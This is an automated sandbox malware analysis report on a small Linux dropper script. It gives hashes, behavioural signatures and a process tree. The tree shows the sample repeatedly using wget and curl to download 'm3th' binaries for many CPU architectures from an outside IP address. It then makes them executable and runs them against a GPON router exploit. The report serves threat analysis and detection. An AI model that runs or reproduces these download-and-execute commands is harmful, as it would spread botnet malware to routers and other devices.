Analysis
-
max time kernel
99s -
max time network
101s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28-07-2024 16:40
Static task
static1
Behavioral task
behavioral1
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Resource
debian9-mipsel-20240729-en
General
-
Target
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
-
Size
3KB
-
MD5
17f41b4b65e5ddad4a76594560d43927
-
SHA1
bb7691396c850ff2b4645b90336852650aa26eb6
-
SHA256
36c3310e8853358d2d68f7b1f0ebd3b52f9691f58286799d1a7b9413903d5588
-
SHA512
602d2b3fda5948c263ab2c48f96993daf5ef404faec82cb2e7f55eae7c8dbed3525b6715f537629d7299c3f4e43077bcf1429b81375e7b2e16f398768920b322
Malware Config
Signatures
-
Executes dropped EXE 13 IoCs
Processes:
g0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayg0awayioc pid process /tmp/g0away 722 g0away /tmp/g0away 728 g0away /tmp/g0away 734 g0away /tmp/g0away 743 g0away /tmp/g0away 749 g0away /tmp/g0away 755 g0away /tmp/g0away 761 g0away /tmp/g0away 767 g0away /tmp/g0away 773 g0away /tmp/g0away 779 g0away /tmp/g0away 785 g0away /tmp/g0away 791 g0away /tmp/g0away 797 g0away -
Reads runtime system information 13 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
17f41b4b65e5ddad4a76594560d43927_JaffaCakes118description ioc process File opened for modification /tmp/g0away 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118
Processes
-
/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes118/tmp/17f41b4b65e5ddad4a76594560d43927_JaffaCakes1181⤵
- Writes file to tmp directory
PID:714 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x862⤵PID:715
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.x862⤵
- Reads runtime system information
PID:719 -
/bin/catcat m3th.x862⤵PID:720
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE2⤵PID:721
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:722 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips2⤵PID:724
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mips2⤵
- Reads runtime system information
PID:725 -
/bin/catcat m3th.mips2⤵PID:726
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE2⤵PID:727
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:728 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl2⤵PID:730
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.mpsl2⤵
- Reads runtime system information
PID:731 -
/bin/catcat m3th.mpsl2⤵PID:732
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away systemd-private-ce23345392e24b8a904cde81b8d5bf52-systemd-timedated.service-7vrsuE2⤵PID:733
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:734 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm2⤵PID:736
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm2⤵
- Reads runtime system information
PID:737 -
/bin/catcat m3th.arm2⤵PID:741
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:742
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:743 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm52⤵PID:745
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm52⤵
- Reads runtime system information
PID:746 -
/bin/catcat m3th.arm52⤵PID:747
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:748
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:749 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm62⤵PID:751
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm62⤵
- Reads runtime system information
PID:752 -
/bin/catcat m3th.arm62⤵PID:753
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:754
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:755 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm72⤵PID:757
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arm72⤵
- Reads runtime system information
PID:758 -
/bin/catcat m3th.arm72⤵PID:759
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:760
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:761 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc2⤵PID:763
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.ppc2⤵
- Reads runtime system information
PID:764 -
/bin/catcat m3th.ppc2⤵PID:765
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:766
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:767 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k2⤵PID:769
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.m68k2⤵
- Reads runtime system information
PID:770 -
/bin/catcat m3th.m68k2⤵PID:771
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:772
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:773 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc2⤵PID:775
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.spc2⤵
- Reads runtime system information
PID:776 -
/bin/catcat m3th.spc2⤵PID:777
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:778
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:779 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i6862⤵PID:781
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.i6862⤵
- Reads runtime system information
PID:782 -
/bin/catcat m3th.i6862⤵PID:783
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:784
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:785 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh42⤵PID:787
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.sh42⤵
- Reads runtime system information
PID:788 -
/bin/catcat m3th.sh42⤵PID:789
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:790
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:791 -
/usr/bin/wgetwget http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc2⤵PID:793
-
/usr/bin/curlcurl -O http://45.95.168.230/0xxx0xxxasdajshdsajhkgdja/m3th.arc2⤵
- Reads runtime system information
PID:794 -
/bin/catcat m3th.arc2⤵PID:795
-
/bin/chmodchmod +x 17f41b4b65e5ddad4a76594560d43927_JaffaCakes118 g0away2⤵PID:796
-
/tmp/g0away./g0away gpon8080.exploit2⤵
- Executes dropped EXE
PID:797